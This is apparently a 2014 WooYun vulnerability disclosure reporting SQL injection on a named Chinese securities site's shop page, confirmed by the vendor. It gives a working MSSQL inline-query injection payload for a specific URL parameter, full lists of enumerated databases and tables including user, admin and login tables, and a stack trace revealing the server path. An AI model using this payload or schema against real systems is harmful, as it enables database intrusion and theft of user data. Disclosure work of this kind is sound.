当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051680

漏洞标题:某证券网站存在sql注入漏洞一枚

相关厂商:中国证劵网

漏洞作者: IT P民

提交时间:2014-02-22 21:20

修复时间:2014-04-08 21:21

公开时间:2014-04-08 21:21

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-22: 细节已通知厂商并且等待厂商处理中
2014-02-27: 厂商已经确认,细节仅向厂商公开
2014-03-09: 细节向核心白帽子及相关领域专家公开
2014-03-19: 细节向普通白帽子公开
2014-03-29: 细节向实习白帽子公开
2014-04-08: 细节向公众公开

简要描述:

某证券网站存在sql注入漏洞一枚

详细说明:

问题url:
http://shop.cnstock.com/gouwulist.aspx?Id=16
注入类型:
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Id=(SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (3604=3604) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(117)+CHAR(113)+CHAR(113))
爆库爆表:

Database: cnstock_passport
[71 tables]
+---------------------------------------------------+
| AdAgency |
| AdEvent |
| AdRecord |
| AgencyEvent |
| Product_BaseInfo |
| RefAdAgencyStatus |
| Sequences |
| ServiceType |
| Services |
| T_ADM_Function |
| T_ADM_Manager |
| T_ADM_ManagerGroup |
| T_ADM_ManagerInGroup |
| T_AccountActive |
| T_AccountEncoder |
| T_AccountFunction |
| T_AccountSecure |
| T_AccountYzm |
| T_Adm_GroupFunction |
| T_Admin |
| T_AuthEmail |
| T_AuthMobile |
| T_AuthPerson |
| T_BatchImport |
| T_BatchImportData |
| T_Debug_Log |
| T_EventType |
| T_Function |
| T_FunctionUser |
| T_ItemReject |
| T_LineItem |
| T_Log |
| T_LogType |
| T_Log_AccountSms |
| T_Log_MobileChannelOrder |
| T_Log_Sms |
| T_Order |
| T_PointType |
| T_Property |
| T_PropertyDetail |
| T_RegSetting |
| T_Right |
| T_Role |
| T_RoleRight |
| T_SecurityServiceSettings |
| T_ServicePayment |
| T_SmsLog |
| T_SystemSettings |
| T_User |
| T_UserActionLog |
| T_UserActionType |
| T_UserPointLog |
| T_UserProperty |
| T_UserRole |
| Tb_ApplyVip |
| Tb_IpBackList |
| Tb_LockLoginErr |
| VW_BatchImport |
| V_AppSystem |
| V_Point |
| V_Product |
| V_RoleRight |
| V_UserActionLog |
| V_UserActionType |
| blog_user |
| oblog_user |
| t_adm_managerInGroup_bak |
| t_log_session |
| t_log_session_mid |
| t_loginsetting |
| vw_blog_user_temp |
+---------------------------------------------------+
Database: cnstock_shop
[43 tables]
+---------------------------------------------------+
| B_Tag |
| B_Type |
| Invoice_Info |
| NewAccountPwdOrderInfo |
| Order_BaseInfo |
| Order_DZB_Info |
| Order_DZB_Info_1 |
| Order_DZB_Info_bf |
| Order_DZB_Info_szb_0701 |
| Order_DetialInfo |
| Order_Status |
| ParamSettg |
| PassOrder_User |
| ProductAgentCustomer |
| ProductGame |
| ProductOfAgent |
| ProductSms |
| Product_AgentInfo |
| Product_AgentLog |
| Product_BaseInfo |
| Product_BaseInfo1 |
| Product_DetialInfo |
| Product_Tag |
| SalePromotion |
| SalePromotion_Rule |
| SaleRule_Product |
| T_Debug_Log |
| User_ExpressAddress |
| User_log |
| Users_Admin |
| Users_Group |
| Users_Group_Role |
| View_Product |
| View_Product_harry |
| _month_rpt |
| order_dzb_info_1125_bad |
| order_dzb_info_1128 |
| sms_loginfo |
| ssnews_account |
| ssnews_account_2012 |
| ssnews_account_2013 |
| ssnews_account_2014 |
| sysdiagrams |
+---------------------------------------------------+
Database: master
[291 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: cnstock_uv
[1 table]
+---------------------------------------------------+
| UC_User |
+---------------------------------------------------+
Database: msdb
[9 tables]
+---------------------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| suspect_pages |
+---------------------------------------------------+


爆绝对路径:
http://shop.cnstock.com/ProductDetial.aspx?id=4%E2%80%9D&os=4

[SqlException (0x80131904): 在将 varchar 值 '4”' 转换成数据类型 int 时失败。]
System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +1950682
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +4846635
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +194
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2392
System.Data.SqlClient.SqlDataReader.HasMoreRows() +157
System.Data.SqlClient.SqlDataReader.ReadInternal(Boolean setTimeout) +197
System.Data.SqlClient.SqlDataReader.Read() +9
Securites.Logic.Product_BaseInfoLogic.SelectCommandReader(Product_BaseInfoEntity entity, String id) in E:\Securites\Comm\Logic\Product_BaseInfoLogic.cs:245
ProductDetial.GetProductDetial(String id, String state) +80
ProductDetial.Page_Load(Object sender, EventArgs e) +185
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627

漏洞证明:

见详细说明,可爆出通行证表等,一等良民,没有拖库

修复方案:

你们懂的~

版权声明:转载请注明来源 IT P民@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-02-27 08:31

厂商回复:

最新状态:

暂无


漏洞评价:

评论